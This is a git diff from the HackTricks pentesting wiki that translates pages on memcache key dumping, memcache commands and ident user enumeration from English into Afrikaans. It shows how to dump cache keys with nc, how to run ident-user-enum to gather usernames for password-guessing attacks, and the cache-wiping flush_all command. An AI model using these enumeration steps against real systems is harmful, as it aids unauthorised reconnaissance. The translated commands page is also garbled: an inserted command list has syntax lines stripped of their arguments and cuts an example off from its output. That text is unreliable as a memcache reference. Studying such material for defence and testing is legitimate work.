die doeltreffendheid van lees- en skryfoperasies. -This output reveals the active slab types, utilized chunks, and operational statistics, offering insights into the efficiency of read and write operations. - -Another useful command, "stats items", provides data on evictions, memory constraints, and item lifecycles: - +'n Ander nuttige bevel, "stats items", verskaf data oor verwyderings, geheuebeperkings en itemlewensiklusse: ```bash stats items [...] ``` +Hierdie statistieke maak dit moontlik om opgevoede aannames te maak oor die gedrag van toepassingskaping, insluitend kapingseffektiwiteit vir verskillende inhoudsgroottes, geheue-toewysing en kapasiteit vir die kaping van groot voorwerpe. -These statistics allow for educated assumptions about application caching behavior, including cache efficiency for different content sizes, memory allocation, and capacity for caching large objects. - -### **Dumping Keys** - -For versions prior to 1.4.31, keys are dumped by slab class using: +### **Sleutels dump** +Vir weergawes vóór 1.4.31 word sleutels gedump deur gebruik te maak van slab-klas: ```bash stats cachedump ``` - -For example, to dump a key in class #1: - +Byvoorbeeld, om 'n sleutel in klas #1 te dump: ```bash stats cachedump 1 1000 ITEM mykey [1 b; 1350677968 s] END ``` +Hierdie metode loop oor slab klasse, onttrek en opsioneel dump sleutelwaardes. -This method iterates over slab classes, extracting and optionally dumping key values. - -### **DUMPING MEMCACHE KEYS (VER 1.4.31+)** - -With memcache version 1.4.31 and above, a new, safer method for dumping keys in a production environment is introduced, utilizing non-blocking mode as detailed in the [release notes](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). This approach generates extensive output, hence the recommendation to employ the 'nc' command for efficiency. Examples include: +### **DUMPING MEMCACHE SLEUTELS (VER 1.4.31+)** +Met memcache weergawe 1.4.31 en hoër, word 'n nuwe, veiliger metode vir die dump van sleutels in 'n produksie-omgewing geïntroduceer, deur gebruik te maak van nie-blokkerende modus soos beskryf in die [vrystellingsnotas](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). Hierdie benadering genereer uitgebreide uitset, daarom word die aanbeveling gemaak om die 'nc' opdrag vir doeltreffendheid te gebruik. Voorbeelde sluit in: ```bash echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | head -1 echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | grep ee6ba58566e234ccbbce13f9a24f9a28 ``` +### **DUMPING GEREEDSKAP** -### **DUMPING TOOLS** +Tabel [van hier](https://lzone.de/blog). -Table [from here](https://lzone.de/blog). +| Programmeertaal | Gereedskap | Funksionaliteit | | | +| --------------- | ---------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ------- | +| PHP | [eenvoudige skripsie](http://snipt.org/xtP) | Druk sleutelname. | | | +| Perl | [eenvoudige skripsie](https://wiki.jasig.org/download/attachments/13572172/memcached-clean.pl?version=1\&modificationDate=1229693957401) | Druk sleutels en waardes af | | | +| Ruby | [eenvoudige skripsie](https://gist.github.com/1365005) | Druk sleutelname. | | | +| Perl | [memdump](https://search.cpan.org/\~dmaki/Memcached-libmemcached-0.4202/src/libmemcached/docs/memdump.pod) | Gereedskap in CPAN-module | [Memcached-libmemcached](https://search.cpan.org/\~dmaki/Memcached-libmemc) | ached/) | +| PHP | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/) | Memcache Monitoringskerm wat ook sleutels kan dump | | | +| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **Bevries jou memcached-proses!!!** Wees versigtig wanneer jy dit in produksie gebruik. Deur dit te gebruik, kan jy die 1MB-beperking omseil en **alle** sleutels regtig dump. | | | -| Programming Languages | Tools | Functionality | | | -| --------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ------- | -| PHP | [simple script](http://snipt.org/xtP) | Prints key names. | | | -| Perl | [simple script](https://wiki.jasig.org/download/attachments/13572172/memcached-clean.pl?version=1\&modificationDate=1229693957401) | Prints keys and values | | | -| Ruby | [simple script](https://gist.github.com/1365005) | Prints key names. | | | -| Perl | [memdump](https://search.cpan.org/\~dmaki/Memcached-libmemcached-0.4202/src/libmemcached/docs/memdump.pod) | Tool in CPAN module | [Memcached-libmemcached](https://search.cpan.org/\~dmaki/Memcached-libmemc) | ached/) | -| PHP | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/) | Memcache Monitoring GUI that also allows dumping keys | | | -| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **Does freeze your memcached process!!!** Be careful when using this in production. Still using it you can workaround the 1MB limitation and really dump **all** keys. | | | +## Probleemoplossing -## Troubleshooting +### 1MB Data Beperking -### 1MB Data Limit +Let daarop dat voor memcached 1.4 kan jy nie voorwerpe groter as 1MB stoor nie as gevolg van die verstek maksimum slabs grootte. -Note that prio to memcached 1.4 you cannot store objects larger than 1MB due to the default maximum slab size. +### Stel nooit 'n tydsbeperking > 30 dae nie! -### Never Set a Timeout > 30 Days! - -If you try to “set” or “add” a key with a timeout bigger than the allowed maximum you might not get what you expect because memcached then treats the value as a Unix timestamp. Also if the timestamp is in the past it will do nothing at all. Your command will silently fail. - -So if you want to use the maximum lifetime specify 2592000. Example: +As jy probeer om 'n sleutel met 'n tydsbeperking groter as die toegelate maksimum te "stel" of "toe te voeg", mag jy nie kry wat jy verwag nie, omdat memcached dan die waarde as 'n Unix-timestamp hanteer. As die tydstempel in die verlede is, sal dit niks doen nie. Jou opdrag sal stilweg misluk. +As jy dus die maksimum leeftyd wil gebruik, spesifiseer 2592000. Voorbeeld: ``` set my_key 0 2592000 1 1 ``` +### Verdwynende Sleutels by Oorvloei -### Disappearing Keys on Overflow +Ten spyte van die dokumentasie wat iets sê oor die oorvloei van 'n waarde van 64-biet, veroorsaak die gebruik van "incr" dat die waarde verdwyn. Dit moet weer geskep word deur gebruik te maak van "add"/"set". -Despite the documentation saying something about wrapping around 64bit overflowing a value using “incr” causes the value to disappear. It needs to be created using “add”/”set” again. +### Replikasie -### Replication +memcached ondersteun nie self replikasie nie. As jy dit regtig nodig het, moet jy van derde party-oplossings gebruik maak: -memcached itself does not support replication. If you really need it you need to use 3rd party solutions: +* [repcached](http://repcached.lab.klab.org/): Multi-meester asynchrone replikasie (memcached 1.2-patchstel) +* [Couchbase memcached-interface](http://www.couchbase.com/memcached): Gebruik CouchBase as 'n memcached-drop-in +* [yrmcds](https://cybozu.github.io/yrmcds/): memcached-kompatibele Meester-Slaaf sleutelwaardestoor +* [twemproxy](https://github.com/twitter/twemproxy) (aka nutcracker): proksi met memcached-ondersteuning -* [repcached](http://repcached.lab.klab.org/): Multi-master async replication (memcached 1.2 patch set) -* [Couchbase memcached interface](http://www.couchbase.com/memcached): Use CouchBase as memcached drop-in -* [yrmcds](https://cybozu.github.io/yrmcds/): memcached compatible Master-Slave key value store -* [twemproxy](https://github.com/twitter/twemproxy) (aka nutcracker): proxy with memcached support - -### Commands Cheat-Sheet +### Opdrag Spiekbriefie {% content-ref url="memcache-commands.md" %} [memcache-commands.md](memcache-commands.md) @@ -204,20 +242,20 @@ memcached itself does not support replication. If you really need it you need to * `port:11211 "STAT pid"` * `"STAT pid"` -## References +## Verwysings * [https://lzone.de/cheat-sheet/memcached](https://lzone.de/cheat-sheet/memcached)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/11211-memcache/memcache-commands.md b/network-services-pentesting/11211-memcache/memcache-commands.md index 95d6e8900..a1349a5d7 100644 --- a/network-services-pentesting/11211-memcache/memcache-commands.md +++ b/network-services-pentesting/11211-memcache/memcache-commands.md @@ -1,64 +1,61 @@ -# Memcache Commands +# Memcache Opdragte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Commands Cheat-Sheet +## Opdragte Spiekbriefie -**From** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached) +**Vanaf** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached) -The supported commands (the official ones and some unofficial) are documented in the [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) document. +Die ondersteunde opdragte (die amptelike en sommige onoffisiële) word gedokumenteer in die [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) dokument. -Sadly the syntax description isn’t really clear and a simple help command listing the existing commands would be much better. Here is an overview of the commands you can find in the [source](https://github.com/memcached/memcached) (as of 19.08.2016): +Ongelukkig is die sintaksisbeskrywing nie regtig duidelik nie en 'n eenvoudige hulpopdrag wat die bestaande opdragte lys, sou baie beter wees. Hier is 'n oorsig van die opdragte wat jy in die [bron](https://github.com/memcached/memcached) kan vind (soos vanaf 19.08.2016): -| Command | Description | Example | +| Opdrag | Beskrywing | Voorbeeld | | --------------------- | --------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| get | Reads a value | `get mykey` | -| set | Set a key unconditionally |

set mykey <flags> <ttl> <size>

<p>Ensure to use \r\n als line breaks when using Unix CLI tools. For example</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

| -| add | Add a new key | `add newkey 0 60 5` | -| replace | Overwrite existing key | `replace key 0 60 5` | -| append | Append data to existing key | `append key 0 60 15` | -| prepend | Prepend data to existing key | `prepend key 0 60 15` | -| incr | Increments numerical key value by given number | `incr mykey 2` | -| decr | Decrements numerical key value by given number | `decr mykey 5` | -| delete | Deletes an existing key | `delete mykey` | -| flush\_all | Invalidate all items immediately | `flush_all` | -| flush\_all | Invalidate all items in n seconds | `flush_all 900` | -| stats | Prints general statistics | `stats` | -| | Prints memory statistics | `stats slabs` | -| | Print higher level allocation statistics | `stats malloc` | -| | Print info on items | `stats items` | +| get | Lees 'n waarde | `get mykey` | +| set | Stel 'n sleutel onvoorwaardelik in |

set mykey <flags> <ttl> <size>

<p>Sorg dat jy \r\n gebruik as lynafbrekings wanneer jy Unix CLI-hulpmiddels gebruik. Byvoorbeeld</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

| +| add | Voeg 'n nuwe sleutel by | `add newkey 0 60 5` | +| replace | Skryf bestaande sleutel oor | `replace key 0 60 5` | +| append | Voeg data by bestaande sleutel | `append key 0 60 15` | +| prepend | Voeg data voor bestaande sleutel | `prepend key 0 60 15` | +| incr | Verhoog numeriese sleutelwaarde met 'n gegewe getal | `incr mykey 2` | +| decr | Verminder numeriese sleutelwaarde met 'n gegewe getal | `decr mykey 5` | +| delete | Verwyder 'n bestaande sleutel | `delete mykey` | +| flush\_all | Maak alle items onmiddellik ongeldig | `flush_all` | +| flush\_all | Maak alle items binne n sekond ongeldig | `flush_all 900` | +| stats | Druk algemene statistieke uit | `stats` | +| | Druk geheue-statistieke uit | `stats slabs` | +| | Druk hoër vlak toewysingsstatistieke uit | `stats malloc` | +| | Druk inligting oor items uit | `stats items` | | | | `stats detail` | | | | `stats sizes` | -| | Resets statistics counters | `stats reset` | -| lru\_crawler metadump | Dump (most of) the metadata for (all of) the items in the cache | `lru_crawler metadump all` | -| version | Prints server version. | `version` | -| verbosity | Increases log level | `verbosity` | -| quit | Terminate session | `quit` | +| | Stel statistiektellers terug | `stats reset` | +| lru\_crawler metadump | Dump (meeste van) die metadata vir (al) die items in die cache | `lru_crawler metadump all` | +| version | Druk bedienerweergawe uit | `version` | +| verbosity | Verhoog logvlak | `verbosity` | +| quit | Beëindig sessie | `quit` | -#### Traffic Statistics - -You can query the current traffic statistics using the command +#### Verkeersstatistieke +Jy kan die huidige verkeersstatistieke navraag doen deur die opdrag te gebruik ``` stats ``` +Jy sal 'n lys kry wat die aantal verbindings, bytes in/uit en nog baie meer diens. -You will get a listing which serves the number of connections, bytes in/out and much more. - -Example Output: - +Voorbeeld Uitset: ``` STAT pid 14868 STAT uptime 175931 @@ -84,17 +81,101 @@ STAT limit_maxbytes 52428800 STAT threads 1 END ``` +#### Geheue Statistieke -#### Memory Statistics - -You can query the current memory statistics using - +Jy kan die huidige geheue statistieke navraag doen deur gebruik te maak van ``` stats slabs ``` +# Memcache Commands -Example Output: +Hier is 'n lys van die mees gebruikte Memcache-opdragte: +## GET + +Die `GET`-opdrag word gebruik om die waarde van 'n sleutel in Memcache te kry. Die sintaks is as volg: + +```bash +GET +``` + +## SET + +Die `SET`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te ken. Die sintaks is as volg: + +```bash +SET [noreply] + +``` + +## ADD + +Die `ADD`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te voeg, maar slegs as die sleutel nog nie bestaan nie. Die sintaks is as volg: + +```bash +ADD [noreply] + +``` + +## REPLACE + +Die `REPLACE`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te ken, maar slegs as die sleutel reeds bestaan. Die sintaks is as volg: + +```bash +REPLACE [noreply] + +``` + +## DELETE + +Die `DELETE`-opdrag word gebruik om 'n sleutel en die bybehorende waarde uit Memcache te verwyder. Die sintaks is as volg: + +```bash +DELETE [noreply] +``` + +## INCR + +Die `INCR`-opdrag word gebruik om die waarde van 'n sleutel in Memcache met 'n sekere bedrag te verhoog. Die sintaks is as volg: + +```bash +INCR [noreply] +``` + +## DECR + +Die `DECR`-opdrag word gebruik om die waarde van 'n sleutel in Memcache met 'n sekere bedrag te verminder. Die sintaks is as volg: + +```bash +DECR [noreply] +``` + +## APPEND + +Die `APPEND`-opdrag word gebruik om data aan die einde van 'n waarde van 'n sleutel in Memcache toe te voeg. Die sintaks is as volg: + +```bash +APPEND [noreply] + +``` + +## PREPEND + +Die `PREPEND`-opdrag word gebruik om data aan die begin van 'n waarde van 'n sleutel in Memcache toe te voeg. Die sintaks is as volg: + +```bash +PREPEND [noreply] + +``` + +## CAS + +Die `CAS`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te ken, maar slegs as die waarde nie verander is sedert die laaste keer wat dit opgevra is nie. Die sintaks is as volg: + +```bash +CAS [noreply] + +``` ``` STAT 1:chunk_size 80 STAT 1:chunks_per_page 13107 @@ -115,19 +196,23 @@ STAT active_slabs 3 STAT total_malloced 3145436 END ``` +As jy onseker is of jy genoeg geheue het vir jou memcached instansie, moet jy altyd kyk na die "evictions" tellers wat deur die "stats" bevel gegee word. As jy genoeg geheue het vir die instansie, moet die "evictions" teller 0 wees of ten minste nie toeneem nie. -If you are unsure if you have enough memory for your memcached instance always look out for the “evictions” counters given by the “stats” command. If you have enough memory for the instance the “evictions” counter should be 0 or at least not increasing. - -#### Which Keys Are Used? - -There is no builtin function to directly determine the current set of keys. However you can use the +#### Watter Sleutels Word Gebruik? +Daar is geen ingeboude funksie om direk die huidige stel sleutels te bepaal nie. Jy kan egter die ``` stats items ``` +## Commando om te bepaal hoeveel sleutels daar bestaan. -command to determine how many keys do exist. +Om te bepaal hoeveel sleutels daar in die memcache-stoorplek bestaan, kan jy die volgende bevel gebruik: +```bash +stats items +``` + +Hierdie bevel sal 'n lys van statistieke vir elke item in die memcache-stoorplek gee. Die aantal sleutels kan bepaal word deur die telling van die items in die lys. ``` stats items STAT items:1:number 220 @@ -137,19 +222,18 @@ STAT items:2:age 1405 [...] END ``` - -This at least helps to see if any keys are used. To dump the key names from a PHP script that already does the memcache access you can use the PHP code from [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html). +Dit help ten minste om te sien of enige sleutels gebruik word. Om die sleutelname uit 'n PHP-skripsie te dump wat reeds die memcache-toegang doen, kan jy die PHP-kode van [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) gebruik.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md index 705b48c1f..4aa133278 100644 --- a/network-services-pentesting/113-pentesting-ident.md +++ b/network-services-pentesting/113-pentesting-ident.md @@ -2,63 +2,60 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Basic Information +## Basiese Inligting -The **Ident Protocol** is used over the **Internet** to associate a **TCP connection** with a specific user. Originally designed to aid in **network management** and **security**, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. +Die **Ident-protokol** word oor die **Internet** gebruik om 'n **TCP-verbinding** te assosieer met 'n spesifieke gebruiker. Oorspronklik ontwerp om te help met **netwerkbestuur** en **sekuriteit**, werk dit deur 'n bediener toe te laat om 'n klient op poort 113 te ondervra om inligting te versoek oor die gebruiker van 'n bepaalde TCP-verbinding. -However, due to modern privacy concerns and the potential for misuse, its usage has decreased as it can inadvertently reveal user information to unauthorized parties. Enhanced security measures, such as encrypted connections and strict access controls, are recommended to mitigate these risks. - -**Default port:** 113 +Tog, as gevolg van moderne privaatheidskwessies en die potensiaal vir misbruik, het die gebruik daarvan afgeneem omdat dit onbedoeld gebruikersinligting aan ongemagtigde partye kan onthul. Verbeterde sekuriteitsmaatreëls, soos versleutelde verbindinge en streng toegangskontroles, word aanbeveel om hierdie risiko's te verminder. +**Verstekpoort:** 113 ``` PORT STATE SERVICE 113/tcp open ident ``` +## **Opsomming** -## **Enumeration** +### **Handleiding - Kry gebruiker/Identifiseer die diens** -### **Manual - Get user/Identify the service** - -If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing: +As 'n masjien die ident en samba (445) dienste hardloop en jy is verbind met samba deur die poort 43218, kan jy uitvind watter gebruiker die samba-diens hardloop deur die volgende te doen: ![](<../.gitbook/assets/image (15) (1) (1).png>) -If you just press enter when you conenct to the service: +As jy net Enter druk wanneer jy met die diens verbind: ![](<../.gitbook/assets/image (16) (1) (1).png>) -Other errors: +Ander foute: ![](<../.gitbook/assets/image (17) (1).png>) ### Nmap -By default (`-sC``) nmap will identify every user of every running port: - +Standaard (`-sC``) sal nmap elke gebruiker van elke lopende poort identifiseer: ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0) |_auth-owners: root -| ssh-hostkey: +| ssh-hostkey: | 1024 88:23:98:0d:9d:8a:20:59:35:b8:14:12:14:d5:d0:44 (DSA) |_ 2048 6b:5d:04:71:76:78:56:96:56:92:a8:02:30:73:ee:fa (RSA) 113/tcp open ident @@ -68,11 +65,9 @@ PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.0.24 (workgroup: LOCAL) |_auth-owners: root ``` +### Ident-gebruiker-enum -### Ident-user-enum - -[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. - +[**Ident-gebruiker-enum**](https://github.com/pentestmonkey/ident-user-enum) is 'n eenvoudige PERL-skrip om die ident-diens (113/TCP) te ondervra om die eienaar van die proses wat op elke TCP-poort van 'n teikensisteem luister, te bepaal. Die lys van gebruikersname wat ingesamel word, kan gebruik word vir wagwoordgissingaanvalle op ander netwerkdienste. Dit kan geïnstalleer word met `apt install ident-user-enum`. ``` root@kali:/opt/local/recon/192.168.1.100# ident-user-enum 192.168.1.100 22 113 139 445 ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) @@ -82,53 +77,50 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) 192.168.1.100:139 root 192.168.1.100:445 root ``` - ### Shodan * `oident` -## Files +## Lêers identd.conf
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloei te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Ident #Protocol Abbreviation if there is one. Port_Number: 113 #Comma separated if there is more than one. Protocol_Description: Identification Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for Ident - Note: | - The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. +Name: Notes +Description: Notes for Ident +Note: | +The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. - https://book.hacktricks.xyz/pentesting/113-pentesting-ident +https://book.hacktricks.xyz/pentesting/113-pentesting-ident Entry_2: - Name: Enum Users - Description: Enumerate Users - Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) +Name: Enum Users +Description: Enumerate Users +Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe 